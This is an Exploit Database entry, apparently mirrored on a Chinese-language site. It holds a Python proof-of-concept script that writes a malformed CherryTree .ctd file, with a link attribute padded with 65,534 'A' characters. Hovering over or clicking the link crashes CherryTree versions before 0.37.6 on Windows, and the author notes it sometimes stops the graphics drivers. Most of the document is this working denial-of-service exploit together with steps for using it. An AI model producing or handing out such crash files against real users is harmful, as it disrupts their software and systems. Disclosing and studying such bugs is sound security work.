CherryTree 0.36.9 – Memory Corruption (PoC)

• Exploit Database
• 18 阅读

• 作者： n30m1nd
  日期： 2016-10-27
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40638/

• #!/usr/bin/python
  
  ### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ### 
  
  # Date: 2016-10-27
  # PoC Author: n30m1nd
  # Vendor Homepage: http://www.giuspen.com/cherrytree/
  # Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
  # Version: Affects all versions of CherryTree prior to 0.37.6
  # Tested on: Win7 64bit and Win10 64 bit
  
  # Credits
  # =======
  # Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
  # Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
  
  # How to
  # ======
  # * Run this python script. It will generate a "PoC-1.ctd" file.
  # * Open the file and hover over the link.
  # Bonus
  # =====
  # It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
  
  # Why?
  # ====
  # For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
  # trying to draw the contents of the graphical bitmaps.
  
  # Exploit code
  # ============
  
  crashfile = '''<?xml version="1.0" ?>
  <cherrytree>
  <node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
  <rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
  </node>
  </cherrytree>
  '''
  
  with open("PoC-1.ctd", 'w') as f:
  f.write(crashfile)
  f.close()